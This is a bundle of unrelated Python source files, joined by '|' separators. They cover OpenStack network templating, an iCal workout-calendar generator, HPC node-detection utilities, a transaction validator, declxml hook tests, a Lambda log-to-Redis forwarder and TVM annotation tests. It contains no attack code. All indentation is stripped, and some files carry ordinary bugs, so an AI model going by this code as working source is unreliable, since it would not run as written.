# License for the specific language governing permissions and limitations
# under the License.
"""Network-releated utilities for supporting libvirt connection code."""
import netaddr
from nova.openstack.common import cfg
CONF = cfg.CONF
CONF.import_opt('use_ipv6', 'nova.config')
CONF.import_opt('injected_network_template', 'nova.virt.disk.api')
Template = None
def _late_load_cheetah():
global Template
if Template is None:
t = __import__('Cheetah.Template', globals(), locals(),
['Template'], -1)
Template = t.Template
def get_net_and_mask(cidr):
net = netaddr.IPNetwork(cidr)
return str(net.ip), str(net.netmask)
def get_net_and_prefixlen(cidr):
net = netaddr.IPNetwork(cidr)
return str(net.ip), str(net._prefixlen)
def get_ip_version(cidr):
net = netaddr.IPNetwork(cidr)
return int(net.version)
def get_injected_network_template(network_info, use_ipv6=CONF.use_ipv6,
template=CONF.injected_network_template):
"""
return a rendered network template for the given network_info
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
Note: this code actually depends on the legacy network_info, but will
convert the type itself if necessary.
"""
# the code below depends on the legacy 'network_info'
if hasattr(network_info, 'legacy'):
network_info = network_info.legacy()
nets = []
ifc_num = -1
have_injected_networks = False
for (network_ref, mapping) in network_info:
ifc_num += 1
if not network_ref['injected']:
continue
have_injected_networks = True
address = mapping['ips'][0]['ip']
netmask = mapping['ips'][0]['netmask']
address_v6 = None
gateway_v6 = None
netmask_v6 = None
if use_ipv6:
address_v6 = mapping['ip6s'][0]['ip']
netmask_v6 = mapping['ip6s'][0]['netmask']
gateway_v6 = mapping['gateway_v6']
net_info = {'name': 'eth%d' % ifc_num,
'address': address,
'netmask': netmask,
'gateway': mapping['gateway'],
'broadcast': mapping['broadcast'],
'dns': ' '.join(mapping['dns']),
'address_v6': address_v6,
'gateway_v6': gateway_v6,
'netmask_v6': netmask_v6}
nets.append(net_info)
if have_injected_networks is False:
return None
if not template:
return None
_late_load_cheetah()
ifc_template = open(template).read()
return str(Template(ifc_template,
searchList=[{'interfaces': nets,
'use_ipv6': use_ipv6}]))
|
"""
A simple program to write an iCal file to create a calendar for the Low Volume Base
Training Plan for trainerroad.com
-Justin Deardorff 2015
"""
import re
import datetime
from datetime import timedelta
#defining iCal pieces for header, footer, and events
header = ["BEGIN:VCALENDAR\n",
"VERSION:2.0\n",
"X-WR-CALNAME: TrainerRoad.com LVBase\n",
"CALSCALE:GREGORIAN\n"]
footer = ["END:VCALENDAR"]
n1 = ["BEGIN:VEVENT\n",
"DTSTAMP:"] #after inserting this, curdtstamp is added
n5 = ["DTSTART;VALUE=DATE:"]
#after inserting this, add start date and line terminator
n2 = ["DTEND;VALUE=DATE:"]
#after inserting this, add date and line terminator
n3 = ["SUMMARY:"]
#after inserting this, add workout name and line terminator
n4 = ["END:VEVENT\n"]
#prompt user for plan start date
print "Please enter plan desired start date."
print "Tuesday start date recommended"
print "Enter date in the following format"
print "YYYYMMDD"
startdate = raw_input('>')
#validate input meets requirements
while len(startdate) != 8:
print "Incorrect date format!"
print "Enter date in the following format"
print "YYYYMMDD"
startdate = raw_input('>')
print "Enter input file name, include filename extension"
print "example.txt"
wrkfile = raw_input('>')
#open input file
infile = open(wrkfile, "r")
#open output file
outfile = open("trbasecal.ics", "w+")
#generate ical header info and write to output file
outfile.writelines(header)
#declare counter variable for workout
workoutnum = 0
for line in infile:
name, days = line.split(",",1) #splits infile into two variables called name and days
name = str(name)
days = int(days)+1
curdtstamp = datetime.datetime.now().strftime("%Y%m%d"+"T"+"%H%M%S"+"Z") #calcs current DTSTAMP
outfile.writelines(n1) #writes beginning of event block
outfile.write(curdtstamp + "\n")
outfile.writelines(n5)
outfile.write(startdate + "\n")
outfile.writelines(n2)
outfile.write(startdate + "\n")
outfile.writelines(n3)
outfile.write(name)
outfile.write("\n")
outfile.writelines(n4)
workoutnum+=1
#insert function to calcuate next workout date
prevdate = datetime.datetime.strptime(startdate, "%Y%m%d")
startdate = prevdate + datetime.timedelta(days=days)
startdate = startdate.strftime("%Y%m%d")
#when loop completes, write iCal file end syntax
outfile.write("END:VCALENDAR")
#close files
outfile.close()
#success message
print "iCal file created. %i workouts added to calendar." %workoutnum
#exit
|
# #
# Copyright 2009-2015 Ghent University
#
# This file is part of hanythingondemand
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/hanythingondemand
#
# hanythingondemand is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# hanythingondemand is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with hanythingondemand. If not, see <http://www.gnu.org/licenses/>.
# #
"""
Network utilities
@author: Stijn De Weirdt (Ghent University)
@author: Ewan Higgs (Ghent University)
@author: Kenneth Hoste (Ghent University)
"""
import re
import os
import socket
from collections import namedtuple
from vsc.utils import fancylogger
from vsc.utils.affinity import sched_getaffinity
from hod.commands.command import ULimit
from hod.utils import only_if_module_is_available
# optional packages, not always required
try:
import netifaces
import netaddr
except ImportError:
pass
NetworkInterface = namedtuple('NetworkInterface', 'hostname,addr,device,mask_bits')
_log = fancylogger.getLogger(fname=False)
@only_if_module_is_available('netaddr')
def netmask2maskbits(netmask):
"""Find the number of bits in a netmask."""
mask_as_int = netaddr.IPAddress(netmask).value
return bin(mask_as_int).count('1')
@only_if_module_is_available('netifaces')
def get_networks():
"""
Returns list of NetworkInterface tuples by interface.
Of the form: [hostname, ipaddr, iface, subnetmask]
"""
devices = netifaces.interfaces()
networks = []
for device in devices:
iface = netifaces.ifaddresses(device)
if netifaces.AF_INET in iface:
iface = iface[netifaces.AF_INET][0]
addr = iface['addr']
mask_bits = netmask2maskbits(iface['netmask'])
hostname = socket.getfqdn(addr)
networks.append(NetworkInterface(hostname, addr, device, mask_bits))
return networks
@only_if_module_is_available('netaddr')
def address_in_network(ip, net):
"""
Determine if an ip is in a network.
e.g. 192.168.0.1 is in 192.168.0.0/24 but not 10.0.0.0/24.
Params
------
ip : str`
ipv4 ip address as string.
net : `str`
Network and mask bits as string (e.g. '192.168.0.0/16')
"""
return netaddr.IPAddress(ip) in netaddr.IPNetwork(net)
def ip_interface_to(networks, ip):
"""Which of the detected network interfaces can reach ip
Params
------
networks : `list of NetworkInterface`
ip : `str`
Destination ipv4 address as string.
"""
for intf in networks:
net = "%s/%s" % (intf.addr, intf.mask_bits)
if address_in_network(ip, net):
return intf
return None
def sorted_network(network):
"""Try to find a preferred network (can be advanced like IPoIB of high-speed ethernet)"""
nw = []
_log.debug("Preferred network selection")
# step 1 alphabetical ordering (who knows in what order ip returns the addresses) on hostname field
network.sort()
# filter for interfaces which have not been assigned hostnames
ip_hostname = re.compile(r"^\d+\.\d+\.\d+\.\d+$")
# look for ib network
ib_reg = re.compile(r"^(ib)\d+$")
for intf in network:
if ib_reg.search(intf.device) and not ip_hostname.search(intf.hostname):
if not intf in nw:
_log.debug("Added intf %s as ib interface", str(intf))
nw.append(intf)
# final selection prefer non-vlan
vlan_reg = re.compile(r"^(.*)\.\d+$")
loopback_reg = re.compile(r"^(lo)\d*$")
for intf in network:
if not (vlan_reg.search(intf.device) or
loopback_reg.search(intf.device) or
ip_hostname.search(intf.hostname)):
if not intf in nw:
_log.debug("Added intf %s as non-vlan or non-loopback interface",
str(intf))
nw.append(intf)
# add remainder non-loopback
for intf in network:
if not loopback_reg.search(intf.device):
if not intf in nw:
_log.debug("Added intf %s as remaining non-loopback interface",
str(intf))
nw.append(intf)
# add remainder
for intf in network:
if not intf in nw:
_log.debug("Added intf %s as remaining interface",
str(intf))
nw.append(intf)
_log.debug("ordered network %s",
nw)
return nw
def _get_memory_proc_meminfo():
re_mem = re.compile(r"^\s*(?P<mem>\d+)(?P<unit>(?:k)B)?\s*$")
proc_meminfo_filename = '/proc/meminfo'
meminfo = {}
for line in open(proc_meminfo_filename).read().replace(' ', '').split('\n'):
if not line.strip():
continue
key = line.split(':')[0].lower().strip()
try:
value = line.split(':')[1].strip()
except IndexError:
_log.error("No :-separated entry for line %s in %s",
line, proc_meminfo_filename)
continue
reg = re_mem.search(value)
if reg:
unit = reg.groupdict()['unit']
mem = int(reg.groupdict()['mem'])
multi = 1
if unit in (None, 'B',):
multi = 1
elif unit in ('kB',):
multi = 2 ** 10
else:
_log.error("Unsupported memory unit %s in key %s value %s", unit, key, value)
meminfo[key] = mem * multi
else:
_log.error("Unknown memory entry in key %s value %s", key, value)
_log.debug("Collected meminfo %s", meminfo)
return meminfo
def _get_memory_ulimit_v():
'''
Return the ulimit for virtual memory in bytes or "unlimited"
'''
stdout, _ = ULimit('-v').run()
if stdout == 'unlimited':
return stdout
else:
#ulimit -v returns kbytes; we want bytes
return int(stdout) * 1024
def get_memory():
"""Extract information about the available memory"""
memory = {}
memory['meminfo'] = _get_memory_proc_meminfo()
memory['ulimit'] = _get_memory_ulimit_v()
return memory
class Node(object):
"""Detect localnode properties"""
def __init__(self):
self.log = fancylogger.getLogger(name=self.__class__.__name__, fname=False)
self.fqdn = 'localhost' # base fqdn hostname
self.network = [] # all possible IPs
self.pid = -1
self.cores = -1
self.usablecores = None
self.totalcores = None
self.topology = [0] # default topology plain set
self.memory = {}
def __str__(self):
return "FQDN %s PID %s" % (self.fqdn, self.pid)
def go(self):
"""A wrapper around some common functions"""
self.fqdn = socket.getfqdn()
self.network = sorted_network(get_networks())
self.pid = os.getpid()
self.usablecores = [idx for idx, used in enumerate(sched_getaffinity().cpus) if used]
self.cores = len(self.usablecores)
self.totalcores = os.sysconf('SC_NPROCESSORS_ONLN')
self.memory = get_memory()
descr = {
'fqdn': self.fqdn,
'network': self.network,
'pid': self.pid,
'cores': self.cores,
'usablecores': self.usablecores,
'totalcores': self.totalcores,
'topology': self.topology,
'memory': self.memory,
}
return descr
|
def valid(trans,ok):
trans=trans.split()
nin=int(trans[1])
lis_in=[]
for i in range(3,nin*3+1,3):
lis_in.append([trans[i], trans[i+1]])
#ins=trans[1:(nin)*3+1]
nout=int(trans[nin*3+2])
lis_out=[]
for i in range(nin*3+3,nin*3+4+nout,3):
lis_out.append([trans[i], trans[i+1]])
tin=0
tout=0
for i in lis_in:
tin+=int(i[1])
if int(i[1])<0: return False
if i not in ok and i[0]!='origin': return False
for i in lis_out:
tout+=int(i[1])
if int(i[1])<0: return False
if (tin!=tout): return False
nom=[]
for i in lis_out:
nom.append(lis_out[0])
for m in nom:
if nom.count(m) != 1: return False
for i in lis_out: ok.append(i)
for i in lis_in:
for p,c in enumerate(ok):
if i[0] == c[0] and i[1] == c[1]:
ok.pop(p)
return True
num_t=int(input())
entradas=[]
for i in range(num_t):
entrada = input()
intrada = entrada.split()
entradas.append([intrada[-1], entrada])
entradas = sorted(entradas)
res=[]
ok=[]
for entrada in entradas:
if (valid(entrada[1],ok)): res.append(entrada[1])
print(len(res))
for i in res: print(i)
|
"""Tests using hooks for validation"""
from collections import namedtuple
import pytest
import declxml as xml
from .helpers import strip_xml
_UserTuple = namedtuple('_UserTuple', [
'name',
'age',
])
class _UserClass(object):
def __init__(self, name=None, age=None):
self.name = name
self.age = age
def __eq__(self, other):
return isinstance(other, _UserClass) and\
other.name == self.name and\
other.age == self.age
def __repr__(self):
return '_UserClass(name=\'{}\', age={})'.format(
self.name, self.age
)
class _ValidationError(Exception):
"""Custom validation error class"""
class TestCustomErrorMessage(object):
"""Provide custom validation error messages."""
def test_array_non_root(self):
"""Custom error message for array values."""
processor = xml.dictionary('data', [
xml.array(xml.integer('value'), nested='values', hooks=self._hooks)
])
xml_string = strip_xml("""
<data>
<values>
<value>1</value>
</values>
</data>
""")
value = {
'values': [1],
}
location = 'data/values'
self._assert_error_message(processor, value, xml_string, location)
def test_array_root(self):
"""Custom error message for array values."""
processor = xml.array(xml.integer('value'), nested='data', hooks=self._hooks)
xml_string = strip_xml("""
<data>
<value>1</value>
</data>
""")
value = [1]
location = 'data'
self._assert_error_message(processor, value, xml_string, location)
def test_dictionary_non_root(self):
"""Custom error message for dictionary values."""
processor = xml.dictionary('data', [
xml.dictionary('user', [
xml.string('name'),
xml.integer('age'),
], hooks=self._hooks)
])
xml_string = strip_xml("""
<data>
<user>
<name>Bob</name>
<age>24</age>
</user>
</data>
""")
value = {
'user': {
'name': 'Bob',
'age': 24,
}
}
location = 'data/user'
self._assert_error_message(processor, value, xml_string, location)
def test_dictionary_root(self):
"""Custom error message for dictionary values."""
processor = xml.dictionary('data', [
xml.string('name'),
xml.integer('age'),
], hooks=self._hooks)
xml_string = strip_xml("""
<data>
<name>Bob</name>
<age>24</age>
</data>
""")
value = {
'name': 'Bob',
'age': 24,
}
location = 'data'
self._assert_error_message(processor, value, xml_string, location)
def test_named_tuple_non_root(self):
"""Custom error message for namedtuple values."""
processor = xml.dictionary('data', [
xml.named_tuple('user', _UserTuple, [
xml.string('name'),
xml.integer('age'),
], hooks=self._hooks)
])
xml_string = strip_xml("""
<data>
<user>
<name>Bob</name>
<age>24</age>
</user>
</data>
""")
value = {'user': _UserTuple(name='Bob', age=24)}
location = 'data/user'
self._assert_error_message(processor, value, xml_string, location)
def test_named_tuple_root(self):
"""Custom error message for namedtuple values."""
processor = xml.named_tuple('data', _UserTuple, [
xml.string('name'),
xml.integer('age'),
], hooks=self._hooks)
xml_string = strip_xml("""
<data>
<name>Bob</name>
<age>24</age>
</data>
""")
value = _UserTuple(name='Bob', age=24)
location = 'data'
self._assert_error_message(processor, value, xml_string, location)
def test_primitive(self):
"""Custom error message for primitive values."""
processor = xml.dictionary('data', [
xml.integer('value', hooks=self._hooks)
])
xml_string = strip_xml("""
<data>
<value>1</value>
</data>
""")
value = {'value': 1}
location = 'data/value'
self._assert_error_message(processor, value, xml_string, location)
def test_user_object_non_root(self):
"""Custom error message for user object values."""
processor = xml.dictionary('data', [
xml.user_object('user', _UserClass, [
xml.string('name'),
xml.integer('age'),
], hooks=self._hooks)
])
xml_string = strip_xml("""
<data>
<user>
<name>Bob</name>
<age>24</age>
</user>
</data>
""")
value = {'user': _UserClass(name='Bob', age=24)}
location = 'data/user'
self._assert_error_message(processor, value, xml_string, location)
def test_user_object_root(self):
"""Custom error message for user object values."""
processor = xml.user_object('data', _UserClass, [
xml.string('name'),
xml.integer('age'),
], hooks=self._hooks)
xml_string = strip_xml("""
<data>
<name>Bob</name>
<age>24</age>
</data>
""")
value = _UserClass(name='Bob', age=24)
location = 'data'
self._assert_error_message(processor, value, xml_string, location)
@staticmethod
def _assert_error_message(processor, value, xml_string, expected_location):
with pytest.raises(_ValidationError) as parse_exception:
xml.parse_from_string(processor, xml_string)
actual_parse_message = str(parse_exception.value)
print(actual_parse_message)
assert actual_parse_message.endswith(expected_location)
with pytest.raises(_ValidationError) as serialize_exception:
xml.serialize_to_string(processor, value)
actual_serialize_message = str(serialize_exception.value)
assert actual_serialize_message.endswith(expected_location)
@property
def _hooks(self):
def validate(state, _):
state.raise_error(_ValidationError, 'Invalid value')
return xml.Hooks(
after_parse=validate,
before_serialize=validate,
)
class TestValidateArray(object):
"""Use hooks to validate array values."""
def test_invalid(self):
"""Invalid array value."""
xml_string = strip_xml("""
<data>
<value>1</value>
<value>3</value>
<value>3</value>
</data>
""")
value = [1, 3, 3]
_assert_invalid(self._processor, value, xml_string)
def test_valid(self):
"""Valid array value."""
xml_string = strip_xml("""
<data>
<value>1</value>
<value>2</value>
<value>3</value>
</data>
""")
value = [1, 2, 3]
_assert_valid(self._processor, value, xml_string)
@property
def _processor(self):
def validate(state, value):
if len(value) != len(set(value)):
state.raise_error(_ValidationError)
return value
hooks = xml.Hooks(
after_parse=validate,
before_serialize=validate,
)
processor = xml.array(xml.integer('value'), hooks=hooks, nested='data')
return processor
class TestValidateDictionary(object):
"""Use hooks to validate dictionary values."""
def test_invalid(self):
"""Invalid dictionary value."""
xml_string = strip_xml("""
<data>
<a>5</a>
<b>6</b>
</data>
""")
value = {
'a': 5,
'b': 6,
}
_assert_invalid(self._processor, value, xml_string)
def test_valid(self):
"""Valid dictionary value."""
xml_string = strip_xml("""
<data>
<a>32</a>
<b>67</b>
</data>
""")
value = {
'a': 32,
'b': 67,
}
_assert_valid(self._processor, value, xml_string)
@property
def _processor(self):
def validate(state, value):
if value['a'] == 5 and value['b'] == 6:
state.raise_error(_ValidationError)
return value
hooks = xml.Hooks(
after_parse=validate,
before_serialize=validate,
)
processor = xml.dictionary('data', [
xml.integer('a'),
xml.integer('b'),
], hooks=hooks)
return processor
class TestValidateNamedTuple(object):
"""Use hooks for validating namedtuple values."""
def test_invalid(self):
"""Invalid namedtuple value"""
xml_string = strip_xml("""
<user>
<name>Bob</name>
<age>24</age>
</user>
""")
value = _UserTuple(name='Bob', age=24)
_assert_invalid(self._processor, value, xml_string)
def test_valid(self):
"""Valid namedtuple value"""
xml_string = strip_xml("""
<user>
<name>Jill</name>
<age>28</age>
</user>
""")
value = _UserTuple(name='Jill', age=28)
_assert_valid(self._processor, value, xml_string)
@property
def _processor(self):
def validate(state, value):
if value.name == 'Bob' and value.age == 24:
state.raise_error(_ValidationError)
return value
hooks = xml.Hooks(
after_parse=validate,
before_serialize=validate,
)
processor = xml.named_tuple('user', _UserTuple, [
xml.string('name'),
xml.integer('age')
], hooks=hooks)
return processor
class TestValidatePrimitive(object):
"""Use hooks for validating primitive values."""
def test_invalid(self):
"""Invalid primitive value"""
xml_string = strip_xml("""
<data>
<value>-91</value>
</data>
""")
value = {'value': -91}
_assert_invalid(self._processor, value, xml_string)
def test_valid(self):
"""Valid primitive value"""
xml_string = strip_xml("""
<data>
<value>32</value>
</data>
""")
value = {'value': 32}
_assert_valid(self._processor, value, xml_string)
@property
def _processor(self):
def validate(state, value):
if value < 0:
state.raise_error(_ValidationError)
return value
hooks = xml.Hooks(
after_parse=validate,
before_serialize=validate
)
processor = xml.dictionary('data', [
xml.integer('value', hooks=hooks)
])
return processor
class TestValidateUserObject(object):
"""Use hooks for validating user object values."""
def test_invalid(self):
"""Invalid namedtuple value"""
xml_string = strip_xml("""
<user>
<name>Bob</name>
<age>24</age>
</user>
""")
value = _UserClass(name='Bob', age=24)
_assert_invalid(self._processor, value, xml_string)
def test_valid(self):
"""Valid namedtuple value"""
xml_string = strip_xml("""
<user>
<name>Jill</name>
<age>28</age>
</user>
""")
value = _UserClass(name='Jill', age=28)
_assert_valid(self._processor, value, xml_string)
@property
def _processor(self):
def validate(state, value):
if value.name == 'Bob' and value.age == 24:
state.raise_error(_ValidationError)
return value
hooks = xml.Hooks(
after_parse=validate,
before_serialize=validate,
)
processor = xml.user_object('user', _UserClass, [
xml.string('name'),
xml.integer('age')
], hooks=hooks)
return processor
def test_aggregate_missing_hooks():
"""Process with missing aggregate hooks."""
hooks = xml.Hooks(
after_parse=None,
before_serialize=None
)
processor = xml.dictionary('data', [
xml.integer('a'),
xml.integer('b')
], hooks=hooks)
xml_string = strip_xml("""
<data>
<a>1</a>
<b>2</b>
</data>
""")
value = {
'a': 1,
'b': 2,
}
_assert_valid(processor, value, xml_string)
def test_primitive_missing_hooks():
"""Process primitive value with missing hooks."""
hooks = xml.Hooks(
after_parse=None,
before_serialize=None
)
processor = xml.dictionary('data', [
xml.integer('value', hooks=hooks)
])
xml_string = strip_xml("""
<data>
<value>1</value>
</data>
""")
value = {'value': 1}
_assert_valid(processor, value, xml_string)
def test_processor_locations_parsing():
"""Get processor location in hooks callback."""
expected_locations = [
xml.ProcessorLocation(element_path='data', array_index=None),
xml.ProcessorLocation(element_path='value', array_index=None)
]
def trace(state, _):
assert isinstance(state, xml.ProcessorStateView)
assert expected_locations == list(state.locations)
hooks = xml.Hooks(
after_parse=trace,
before_serialize=trace,
)
processor = xml.dictionary('data', [
xml.integer('value', hooks=hooks),
])
xml_string = strip_xml("""
<data>
<value>1</value>
</data>
""")
value = {'value': 1}
xml.parse_from_string(processor, xml_string)
xml.serialize_to_string(processor, value)
def _assert_invalid(processor, value, xml_string):
"""Assert the processor rejects the XML and value as invalid."""
with pytest.raises(_ValidationError):
xml.parse_from_string(processor, xml_string)
with pytest.raises(_ValidationError):
xml.serialize_to_string(processor, value)
def _assert_valid(processor, value, xml_string):
"""Assert the processor accepts the XML and value as valid."""
actual_value = xml.parse_from_string(processor, xml_string)
assert value == actual_value
actual_xml_string = xml.serialize_to_string(processor, value)
assert xml_string == actual_xml_string
|
import os
import re
import string
import logging
import urllib
import zlib
import boto3
import redis
REDIS_SERVER = os.environ['REDIS_SERVER']
REDIS_PORT = os.environ['REDIS_PORT']
REDIS_DB = os.environ['REDIS_DB']
REDIS_KEY = os.environ['REDIS_KEY']
DEST_BUCKET = os.environ['DEST_BUCKET']
DEST_PREFIX = os.environ['DEST_PREFIX']
def lambda_handler(event, context):
# connect redis
r = redis.StrictRedis(host=REDIS_SERVER, port=REDIS_PORT, db=REDIS_DB)
# get the s3 object
s3 = boto3.client('s3')
bucket = event['Records'][0]['s3']['bucket']['name']
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key'].encode('utf8'))
# generate dest key
regex = "(?P<prefix>.*)\/(?P<distributionid>.*)\.(?P<year>[0-9]{4})\-(?P<month>[0-9]{2})\-(?P<day>[0-9]{2})\-(?P<hour>[0-9]{2})\.(?P<hash>.*)\.gz"
replace = "yyyy=\g<year>/mm=\g<month>/dd=\g<day>/hh=\g<hour>/\g<distributionid>.\g<year>-\g<month>-\g<day>-\g<hour>.\g<hash>.gz"
dest_key = DEST_PREFIX + '/' + re.sub(regex, replace, key)
try:
response = s3.get_object(Bucket=bucket, Key=key)
data = response['Body'].read()
# unzip and split logs by line
logs = string.split(zlib.decompress(data, 16+zlib.MAX_WBITS), '\n')
# for each log, push it to the redis queue
for log in logs:
r.lpush(REDIS_KEY, log)
# partition log file
s3.copy({'Bucket': bucket, 'Key': key}, DEST_BUCKET, dest_key)
except Exception as e:
print(e)
raise e
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for annotating external targets."""
import os
import sys
import numpy as np
import pytest
import tvm
import tvm.relay.testing
import tvm.relay.transform as transform
from tvm import relay
from tvm import runtime
from tvm.contrib import utils
def check_result(
mod, map_inputs, out_shape, result, tol=1e-5, target="llvm", ctx=tvm.cpu(), params=None
):
if sys.platform == "win32":
print("Skip test on Windows for now")
return
def update_lib(lib):
test_dir = os.path.dirname(os.path.realpath(os.path.expanduser(__file__)))
source_dir = os.path.join(test_dir, "..", "..", "..")
contrib_path = os.path.join(source_dir, "src", "runtime", "contrib")
kwargs = {}
kwargs["options"] = ["-O2", "-std=c++14", "-I" + contrib_path]
tmp_path = utils.tempdir()
lib_name = "lib.so"
lib_path = tmp_path.relpath(lib_name)
lib.export_library(lib_path, fcompile=False, **kwargs)
lib = runtime.load_module(lib_path)
return lib
def check_vm_result():
with tvm.transform.PassContext(opt_level=3, disabled_pass=["AlterOpLayout"]):
exe = relay.vm.compile(mod, target=target, params=params)
code, lib = exe.save()
lib = update_lib(lib)
exe = runtime.vm.Executable.load_exec(code, lib)
vm = runtime.vm.VirtualMachine(exe, ctx)
out = vm.run(**map_inputs)
tvm.testing.assert_allclose(out.asnumpy(), result, rtol=tol, atol=tol)
def check_graph_runtime_result():
with tvm.transform.PassContext(opt_level=3, disabled_pass=["AlterOpLayout"]):
json, lib, param = relay.build(mod, target=target, params=params)
lib = update_lib(lib)
rt_mod = tvm.contrib.graph_runtime.create(json, lib, ctx)
for name, data in map_inputs.items():
rt_mod.set_input(name, data)
rt_mod.set_input(**param)
rt_mod.run()
out = tvm.nd.empty(out_shape, ctx=ctx)
out = rt_mod.get_output(0, out)
tvm.testing.assert_allclose(out.asnumpy(), result, rtol=tol, atol=tol)
check_vm_result()
check_graph_runtime_result()
def test_extern_dnnl():
def annotated(dtype, ishape, w1shape):
data = relay.var("data", shape=(ishape), dtype=dtype)
weight1 = relay.var("weight1", shape=(w1shape), dtype=dtype)
depthwise_conv2d_1 = relay.nn.conv2d(
data, weight1, kernel_size=(3, 3), padding=(1, 1), groups=32
)
depthwise_conv2d_2 = relay.nn.conv2d(
depthwise_conv2d_1, weight1, kernel_size=(3, 3), padding=(1, 1), groups=32
)
out = relay.add(depthwise_conv2d_1, depthwise_conv2d_2)
f = relay.Function([data, weight1], out)
mod = tvm.IRModule.from_expr(f)
return mod
def expected(dtype, ishape, w1shape):
data = relay.var("data", shape=(ishape), dtype=dtype)
weight1 = relay.var("weight1", shape=(w1shape), dtype=dtype)
begin0 = relay.annotation.compiler_begin(data, "dnnl")
begin1 = relay.annotation.compiler_begin(weight1, "dnnl")
depthwise_conv2d_1 = relay.nn.conv2d(
begin0, begin1, kernel_size=(3, 3), padding=(1, 1), groups=32
)
end0 = relay.annotation.compiler_end(depthwise_conv2d_1, "dnnl")
end1 = relay.annotation.compiler_end(depthwise_conv2d_1, "dnnl")
begin2 = relay.annotation.compiler_begin(end1, "dnnl")
begin3 = relay.annotation.compiler_begin(end0, "dnnl")
begin4 = relay.annotation.compiler_begin(weight1, "dnnl")
depthwise_conv2d_2 = relay.nn.conv2d(
begin3, begin4, kernel_size=(3, 3), padding=(1, 1), groups=32
)
end2 = relay.annotation.compiler_end(depthwise_conv2d_2, "dnnl")
begin5 = relay.annotation.compiler_begin(end2, "dnnl")
out = relay.add(begin2, begin5)
end3 = relay.annotation.compiler_end(out, "dnnl")
f = relay.Function([data, weight1], end3)
mod = tvm.IRModule.from_expr(f)
return mod
dtype = "float32"
ishape = (1, 32, 14, 14)
w1shape = (32, 1, 3, 3)
def test_annotate():
mod = annotated(dtype, ishape, w1shape)
mod = transform.AnnotateTarget("dnnl")(mod)
mod = relay.transform.InferType()(mod)
ref_mod = expected(dtype, ishape, w1shape)
ref_mod = relay.transform.InferType()(ref_mod)
tvm.ir.assert_structural_equal(mod, ref_mod)
def test_run():
if not tvm.get_global_func("relay.ext.dnnl", True):
print("skip because DNNL codegen is not available")
return
ref_mod = annotated(dtype, ishape, w1shape)
mod = annotated(dtype, ishape, w1shape)
mod = transform.PartitionGraph()(mod)
i_data = np.random.uniform(0, 1, ishape).astype(dtype)
w1_data = np.random.uniform(0, 1, w1shape).astype(dtype)
ref_ex = relay.create_executor("graph", mod=ref_mod, ctx=tvm.cpu())
ref_res = ref_ex.evaluate()(i_data, w1_data)
check_result(
mod, {"data": i_data, "weight1": w1_data}, (1, 32, 14, 14), ref_res.asnumpy(), tol=1e-5
)
test_annotate()
test_run()
@pytest.mark.skip(reason="fix constant node before opening this case")
def test_extern_dnnl_mobilenet():
if not tvm.get_global_func("relay.ext.dnnl", True):
print("skip because DNNL codegen is not available")
return
dtype = "float32"
ishape = (1, 3, 224, 224)
mod, params = relay.testing.mobilenet.get_workload(batch_size=1, dtype="float32")
mod["main"] = relay.build_module.bind_params_by_name(mod["main"], params)
mod = transform.AnnotateTarget("dnnl")(mod)
mod = transform.PartitionGraph()(mod)
i_data = np.random.uniform(0, 1, ishape).astype(dtype)
ref_mod, params = relay.testing.mobilenet.get_workload(batch_size=1, dtype="float32")
ref_ex = relay.create_executor("graph", mod=ref_mod, ctx=tvm.cpu(0))
ref_res = ref_ex.evaluate()(i_data, **params)
check_result(mod, {"data": i_data}, (1, 1000), ref_res.asnumpy(), tol=1e-5, params=params)
def test_multiple_ends():
@tvm.ir.register_op_attr("nn.relu", "target.test")
def relu(expr): # pylint: disable=unused-variable
return True
def before():
x = relay.var("x", shape=(10, 10))
r = relay.nn.relu(x)
a_1 = relay.abs(r)
a_2 = relay.abs(r)
out = relay.add(a_1, a_2)
f = relay.Function([x], out)
mod = tvm.IRModule.from_expr(f)
return mod
def after():
x = relay.var("x", shape=(10, 10))
cb_1 = relay.annotation.compiler_begin(x, "test")
r = relay.nn.relu(cb_1)
ce_1 = relay.annotation.compiler_end(r, "test")
ce_2 = relay.annotation.compiler_end(r, "test")
cb_2 = relay.annotation.compiler_begin(ce_1, "default")
cb_3 = relay.annotation.compiler_begin(ce_2, "default")
a_1 = relay.abs(cb_2)
a_2 = relay.abs(cb_3)
ce_3 = relay.annotation.compiler_end(a_1, "default")
ce_4 = relay.annotation.compiler_end(a_2, "default")
cb_4 = relay.annotation.compiler_begin(ce_3, "default")
cb_5 = relay.annotation.compiler_begin(ce_4, "default")
out = relay.add(cb_4, cb_5)
ce_6 = relay.annotation.compiler_end(out, "default")
f = relay.Function([x], ce_6)
mod = tvm.IRModule.from_expr(f)
return mod
for annotate_non_call_ops in [False, True]:
result = transform.AnnotateTarget("test", annotate_non_call_ops)(before())
expected = transform.InferType()(after())
assert tvm.ir.structural_equal(expected, result)
def test_type_propagation():
target = "test_type_propagation"
@tvm.ir.register_op_attr("nn.relu", "target." + target)
def relu(expr): # pylint: disable=unused-variable
return expr.args[0].checked_type.dtype == "float32"
def before():
x = relay.var("x", shape=(10, 10))
r = relay.nn.relu(x)
out = relay.nn.relu(r)
f = relay.Function([x], out)
mod = tvm.IRModule.from_expr(f)
return mod
for annotate_non_call_ops in [False, True]:
# If the type isn't propogated, then the relu checker function will fail to get the dtype.
